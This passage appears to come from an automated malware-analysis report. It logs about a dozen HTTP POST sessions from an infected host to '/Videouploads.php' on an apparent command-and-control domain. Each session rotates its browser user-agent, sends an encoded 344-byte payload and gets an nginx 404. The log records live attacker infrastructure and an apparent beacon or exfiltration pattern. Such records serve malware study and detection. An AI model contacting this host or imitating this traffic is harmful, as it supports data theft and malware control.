                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49740 | Destination IP: 185.158.202.52 | Destination Port: 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jan 2, 2025 07:42:56.378424883 CET | 326 | OUT | POST /Videouploads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                  Host: 797441cm.n9shteam2.top
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 2, 2025 07:42:56.742400885 CET | 344 | OUT | Data Raw: 00 0b 01 05 06 0c 01 02 05 06 02 01 02 04 01 05 00 03 05 0e 02 01 03 00 02 06 0d 0d 04 53 02 03 0c 0e 07 09 03 02 06 56 0f 02 04 07 07 50 02 01 04 07 0f 09 0d 00 04 55 05 06 03 05 05 02 05 0e 05 03 0e 00 07 0f 04 03 0f 0f 0c 54 0a 01 0b 01 06 01
                                                  Data Ascii: SVPUTRV\L~czwrrYweZk|S`Ro]kpo[{os{sjkC`C`dtu~V@@{Sv~bW
                                                  Jan 2, 2025 07:42:57.033515930 CET | 25 | IN | HTTP/1.1 100 Continue
                                                  Jan 2, 2025 07:42:57.166054010 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 02 Jan 2025 06:42:53 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 213
                                                  Connection: keep-alive
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49747 | Destination IP: 185.158.202.52 | Destination Port: 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jan 2, 2025 07:42:58.223350048 CET | 309 | OUT | POST /Videouploads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                  Host: 797441cm.n9shteam2.top
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 2, 2025 07:42:58.577889919 CET | 344 | OUT | Data Raw: 00 02 01 01 06 0a 01 01 05 06 02 01 02 03 01 05 00 01 05 0b 02 04 03 00 01 0f 0e 0c 07 01 00 06 0f 02 06 09 02 00 04 04 0f 06 07 0a 00 07 06 00 03 00 0d 09 0f 00 01 06 04 04 06 07 01 05 06 08 00 07 0c 0b 04 56 06 08 0f 07 0e 00 0e 0c 0c 55 05 0c
                                                  Data Ascii: VUZWU\L}R|c~@cqb]wupBkRaM`Bh~`tKxR{{^_Xh}^@cwliO~V@{S~L}rW
                                                  Jan 2, 2025 07:42:58.887072086 CET | 25 | IN | HTTP/1.1 100 Continue
                                                  Jan 2, 2025 07:42:59.014481068 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 02 Jan 2025 06:42:55 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 213
                                                  Connection: keep-alive
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49788 | Destination IP: 185.158.202.52 | Destination Port: 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jan 2, 2025 07:43:04.689801931 CET | 273 | OUT | POST /Videouploads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: 797441cm.n9shteam2.top
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 2, 2025 07:43:05.046686888 CET | 344 | OUT | Data Raw: 00 01 01 02 06 01 04 02 05 06 02 01 02 0d 01 01 00 01 05 0e 02 06 03 0e 07 0f 0d 51 03 04 06 05 0f 56 06 09 00 53 06 57 0e 0a 04 53 07 05 04 04 07 04 0f 0d 0c 00 06 06 04 03 06 07 07 52 07 01 01 03 0d 0c 00 02 06 51 0c 05 0e 0e 0a 04 0d 51 06 02
                                                  Data Ascii: QVSWSRQQ\\L}Sk^POcrr\b[oU|bXc|`BhcpoBQK{cy_|~pww^~u~V@xS~}\i
                                                  Jan 2, 2025 07:43:05.326363087 CET | 25 | IN | HTTP/1.1 100 Continue
                                                  Jan 2, 2025 07:43:05.458293915 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 02 Jan 2025 06:43:01 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 213
                                                  Connection: keep-alive
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49809 | Destination IP: 185.158.202.52 | Destination Port: 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jan 2, 2025 07:43:07.925662041 CET | 309 | OUT | POST /Videouploads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                  Host: 797441cm.n9shteam2.top
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 2, 2025 07:43:08.281053066 CET | 344 | OUT | Data Raw: 05 05 04 02 03 0f 04 05 05 06 02 01 02 0c 01 01 00 04 05 0b 02 04 03 0b 03 01 0a 04 04 54 02 02 0f 03 04 0f 02 06 05 06 0e 54 04 0a 07 56 07 00 03 05 0d 0b 0d 04 05 0b 04 02 06 53 07 04 04 0d 03 06 0a 0a 04 04 07 02 0c 01 0c 01 0a 0c 0d 09 06 05
                                                  Data Ascii: TTVSW\L}PkYvcbv]uKxh}wUw^|c]^oBcKzpX|m`vdt~u~V@xSTL}r}
                                                  Jan 2, 2025 07:43:08.590106010 CET | 25 | IN | HTTP/1.1 100 Continue
                                                  Jan 2, 2025 07:43:08.727977037 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 02 Jan 2025 06:43:05 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 213
                                                  Connection: keep-alive
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49820 | Destination IP: 185.158.202.52 | Destination Port: 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jan 2, 2025 07:43:09.772655010 CET | 308 | OUT | POST /Videouploads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                  Host: 797441cm.n9shteam2.top
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 2, 2025 07:43:10.125345945 CET | 344 | OUT | Data Raw: 05 05 01 02 06 01 01 06 05 06 02 01 02 0d 01 04 00 07 05 01 02 02 03 0c 07 05 0f 0d 06 01 00 05 0f 00 05 09 01 03 06 07 0c 05 02 01 05 54 02 03 03 03 0e 0f 0e 07 01 06 01 0e 04 06 07 0b 00 0c 05 0b 0a 00 04 56 05 03 0e 57 0d 02 0a 00 0b 03 06 01
                                                  Data Ascii: TVW\L~C|Nq\`ab\vewSBf\cRsX|MUY{lcHxNfKCPwY|Nie~V@{Cf~\a
                                                  Jan 2, 2025 07:43:10.406136990 CET | 25 | IN | HTTP/1.1 100 Continue
                                                  Jan 2, 2025 07:43:10.542355061 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 02 Jan 2025 06:43:06 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 213
                                                  Connection: keep-alive
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49841 | Destination IP: 185.158.202.52 | Destination Port: 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jan 2, 2025 07:43:12.777729034 CET | 326 | OUT | POST /Videouploads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                  Host: 797441cm.n9shteam2.top
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 2, 2025 07:43:13.124891043 CET | 344 | OUT | Data Raw: 05 06 01 07 06 0f 01 07 05 06 02 01 02 03 01 04 00 0a 05 0f 02 0c 03 08 00 53 0a 00 06 01 01 54 0f 52 07 0b 02 03 04 07 0d 03 06 03 06 04 06 00 04 53 0c 5a 0f 50 05 00 06 0f 04 06 07 02 06 0c 01 04 0d 01 04 0f 05 06 0b 02 0c 01 0c 02 0b 05 04 07
                                                  Data Ascii: STRSZPSWRU\L~pztrSLvSyw|h`tK{|UKoY~}~h`Y^}e~V@{C\rq
                                                  Jan 2, 2025 07:43:13.413958073 CET | 25 | IN | HTTP/1.1 100 Continue
                                                  Jan 2, 2025 07:43:13.542433023 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 02 Jan 2025 06:43:10 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 213
                                                  Connection: keep-alive
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session ID: 9 | Source IP: 192.168.2.4 | Source Port: 49859 | Destination IP: 185.158.202.52 | Destination Port: 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jan 2, 2025 07:43:15.270199060 CET | 273 | OUT | POST /Videouploads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: 797441cm.n9shteam2.top
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 2, 2025 07:43:15.624830008 CET | 344 | OUT | Data Raw: 05 06 04 0c 06 0c 04 05 05 06 02 01 02 02 01 00 00 01 05 09 02 05 03 01 00 00 0c 05 04 55 03 55 0f 55 06 01 02 51 03 07 0f 0b 05 50 00 01 04 0e 05 02 0b 0e 0a 0f 04 52 04 53 06 50 06 55 07 01 02 07 0d 0c 04 06 07 06 0e 04 0b 05 0f 04 0e 01 05 53
                                                  Data Ascii: UUUQPRSPUSTWR\L}Sk^Tvquv\`~luBv|c|olcx`PC`wdhi_~V@xC~N}b[
                                                  Jan 2, 2025 07:43:15.897964001 CET | 25 | IN | HTTP/1.1 100 Continue
                                                  Jan 2, 2025 07:43:16.030421019 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 02 Jan 2025 06:43:12 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 213
                                                  Connection: keep-alive
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session ID: 10 | Source IP: 192.168.2.4 | Source Port: 49995 | Destination IP: 185.158.202.52 | Destination Port: 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jan 2, 2025 07:43:37.214448929 CET | 309 | OUT | POST /Videouploads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                  Host: 797441cm.n9shteam2.top
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 2, 2025 07:43:37.562329054 CET | 344 | OUT | Data Raw: 05 01 04 00 06 0c 04 07 05 06 02 01 02 06 01 03 00 00 05 0d 02 04 03 0b 00 53 0c 0c 06 0f 00 09 0c 02 05 01 02 03 04 57 0b 04 05 01 00 07 07 04 07 02 0d 0a 0e 01 06 02 06 07 05 05 05 52 06 0c 01 0a 0e 0a 06 06 05 51 0b 03 0e 55 0c 0c 0d 05 05 53
                                                  Data Ascii: SWRQUSPQ\L~NfOt[qv\p@}clU^~soZy|dYlNPI|}wQvgo_j_~V@Bx}z}r}
                                                  Jan 2, 2025 07:43:37.850827932 CET | 25 | IN | HTTP/1.1 100 Continue
                                                  Jan 2, 2025 07:43:37.978218079 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 02 Jan 2025 06:43:34 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 213
                                                  Connection: keep-alive
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session ID: 11 | Source IP: 192.168.2.4 | Source Port: 50013 | Destination IP: 185.158.202.52 | Destination Port: 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jan 2, 2025 07:43:45.319977999 CET | 326 | OUT | POST /Videouploads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                  Host: 797441cm.n9shteam2.top
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 2, 2025 07:43:45.671842098 CET | 344 | OUT | Data Raw: 05 02 04 0c 03 0b 04 06 05 06 02 01 02 01 01 02 00 02 05 0c 02 0c 03 0b 07 04 0f 06 03 0f 03 06 0f 05 06 01 00 0c 03 02 0c 56 07 03 05 0b 04 00 06 06 0b 00 0c 05 07 00 04 0f 06 50 07 07 06 00 01 03 0f 00 05 03 07 02 0f 03 0b 06 0c 02 0c 03 02 03
                                                  Data Ascii: VPRQT\L}UpvOwr~\bvl@hBb\wB|~swYl|UHop~}^ww`~e~V@xmrr}
                                                  Jan 2, 2025 07:43:45.975331068 CET | 25 | IN | HTTP/1.1 100 Continue
                                                  Jan 2, 2025 07:43:46.106070995 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 02 Jan 2025 06:43:42 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 213
                                                  Connection: keep-alive
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session ID: 12 | Source IP: 192.168.2.4 | Source Port: 50014 | Destination IP: 185.158.202.52 | Destination Port: 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jan 2, 2025 07:43:48.648454905 CET | 326 | OUT | POST /Videouploads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                  Host: 797441cm.n9shteam2.top
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 2, 2025 07:43:48.999847889 CET | 344 | OUT | Data Raw: 05 05 04 0d 06 0a 01 00 05 06 02 01 02 04 01 01 00 06 05 0f 02 0d 03 09 01 01 0a 06 05 02 01 50 0f 56 04 01 03 04 07 00 0e 57 02 0b 07 01 04 02 05 03 0f 01 0a 05 04 52 01 07 03 05 06 01 04 01 01 0b 0e 0b 07 54 04 08 0e 00 0b 0f 0c 0d 0c 06 02 00
                                                  Data Ascii: PVWRTUV\L~|N~@vr_uv||v]`Rtk]oYyolYbJh~pNc^hj_~V@@xSbbu
                                                  Jan 2, 2025 07:43:49.285562038 CET | 25 | IN | HTTP/1.1 100 Continue
                                                  Jan 2, 2025 07:43:49.418426991 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 02 Jan 2025 06:43:45 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 213
                                                  Connection: keep-alive
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session ID: 13 | Source IP: 192.168.2.4 | Source Port: 50015 | Destination IP: 185.158.202.52 | Destination Port: 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jan 2, 2025 07:43:52.273149967 CET | 309 | OUT | POST /Videouploads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
